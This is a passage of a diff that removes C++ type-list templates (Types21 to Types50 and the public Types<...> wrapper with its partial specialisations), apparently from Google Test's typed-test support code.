-    typename T21>
-struct Types21 {
-  typedef T1 Head;
-  typedef Types20<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22>
-struct Types22 {
-  typedef T1 Head;
-  typedef Types21<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23>
-struct Types23 {
-  typedef T1 Head;
-  typedef Types22<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24>
-struct Types24 {
-  typedef T1 Head;
-  typedef Types23<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25>
-struct Types25 {
-  typedef T1 Head;
-  typedef Types24<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26>
-struct Types26 {
-  typedef T1 Head;
-  typedef Types25<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27>
-struct Types27 {
-  typedef T1 Head;
-  typedef Types26<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28>
-struct Types28 {
-  typedef T1 Head;
-  typedef Types27<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29>
-struct Types29 {
-  typedef T1 Head;
-  typedef Types28<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30>
-struct Types30 {
-  typedef T1 Head;
-  typedef Types29<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31>
-struct Types31 {
-  typedef T1 Head;
-  typedef Types30<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32>
-struct Types32 {
-  typedef T1 Head;
-  typedef Types31<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33>
-struct Types33 {
-  typedef T1 Head;
-  typedef Types32<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34>
-struct Types34 {
-  typedef T1 Head;
-  typedef Types33<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35>
-struct Types35 {
-  typedef T1 Head;
-  typedef Types34<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36>
-struct Types36 {
-  typedef T1 Head;
-  typedef Types35<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37>
-struct Types37 {
-  typedef T1 Head;
-  typedef Types36<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38>
-struct Types38 {
-  typedef T1 Head;
-  typedef Types37<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39>
-struct Types39 {
-  typedef T1 Head;
-  typedef Types38<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40>
-struct Types40 {
-  typedef T1 Head;
-  typedef Types39<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41>
-struct Types41 {
-  typedef T1 Head;
-  typedef Types40<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42>
-struct Types42 {
-  typedef T1 Head;
-  typedef Types41<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43>
-struct Types43 {
-  typedef T1 Head;
-  typedef Types42<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44>
-struct Types44 {
-  typedef T1 Head;
-  typedef Types43<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-      T44> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45>
-struct Types45 {
-  typedef T1 Head;
-  typedef Types44<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-      T44, T45> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46>
-struct Types46 {
-  typedef T1 Head;
-  typedef Types45<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-      T44, T45, T46> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47>
-struct Types47 {
-  typedef T1 Head;
-  typedef Types46<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-      T44, T45, T46, T47> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48>
-struct Types48 {
-  typedef T1 Head;
-  typedef Types47<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-      T44, T45, T46, T47, T48> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49>
-struct Types49 {
-  typedef T1 Head;
-  typedef Types48<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-      T44, T45, T46, T47, T48, T49> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49, typename T50>
-struct Types50 {
-  typedef T1 Head;
-  typedef Types49<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-      T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-      T44, T45, T46, T47, T48, T49, T50> Tail;
-};
-
-
-}  // namespace internal
-
-// We don't want to require the users to write TypesN<...> directly,
-// as that would require them to count the length.  Types<...> is much
-// easier to write, but generates horrible messages when there is a
-// compiler error, as gcc insists on printing out each template
-// argument, even if it has the default value (this means Types<int>
-// will appear as Types<int, None, None, ..., None> in the compiler
-// errors).
-//
-// Our solution is to combine the best part of the two approaches: a
-// user would write Types<T1, ..., TN>, and Google Test will translate
-// that to TypesN<T1, ..., TN> internally to make error messages
-// readable.  The translation is done by the 'type' member of the
-// Types template.
-template <typename T1 = internal::None, typename T2 = internal::None,
-    typename T3 = internal::None, typename T4 = internal::None,
-    typename T5 = internal::None, typename T6 = internal::None,
-    typename T7 = internal::None, typename T8 = internal::None,
-    typename T9 = internal::None, typename T10 = internal::None,
-    typename T11 = internal::None, typename T12 = internal::None,
-    typename T13 = internal::None, typename T14 = internal::None,
-    typename T15 = internal::None, typename T16 = internal::None,
-    typename T17 = internal::None, typename T18 = internal::None,
-    typename T19 = internal::None, typename T20 = internal::None,
-    typename T21 = internal::None, typename T22 = internal::None,
-    typename T23 = internal::None, typename T24 = internal::None,
-    typename T25 = internal::None, typename T26 = internal::None,
-    typename T27 = internal::None, typename T28 = internal::None,
-    typename T29 = internal::None, typename T30 = internal::None,
-    typename T31 = internal::None, typename T32 = internal::None,
-    typename T33 = internal::None, typename T34 = internal::None,
-    typename T35 = internal::None, typename T36 = internal::None,
-    typename T37 = internal::None, typename T38 = internal::None,
-    typename T39 = internal::None, typename T40 = internal::None,
-    typename T41 = internal::None, typename T42 = internal::None,
-    typename T43 = internal::None, typename T44 = internal::None,
-    typename T45 = internal::None, typename T46 = internal::None,
-    typename T47 = internal::None, typename T48 = internal::None,
-    typename T49 = internal::None, typename T50 = internal::None>
-struct Types {
-  typedef internal::Types50<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44, T45, T46, T47, T48, T49, T50> type;
-};
-
-template <>
-struct Types<internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types0 type;
-};
-template <typename T1>
-struct Types<T1, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types1<T1> type;
-};
-template <typename T1, typename T2>
-struct Types<T1, T2, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types2<T1, T2> type;
-};
-template <typename T1, typename T2, typename T3>
-struct Types<T1, T2, T3, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types3<T1, T2, T3> type;
-};
-template <typename T1, typename T2, typename T3, typename T4>
-struct Types<T1, T2, T3, T4, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types4<T1, T2, T3, T4> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5>
-struct Types<T1, T2, T3, T4, T5, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types5<T1, T2, T3, T4, T5> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6>
-struct Types<T1, T2, T3, T4, T5, T6, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types6<T1, T2, T3, T4, T5, T6> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7>
-struct Types<T1, T2, T3, T4, T5, T6, T7, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types7<T1, T2, T3, T4, T5, T6, T7> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types8<T1, T2, T3, T4, T5, T6, T7, T8> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types9<T1, T2, T3, T4, T5, T6, T7, T8, T9> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, internal::None,
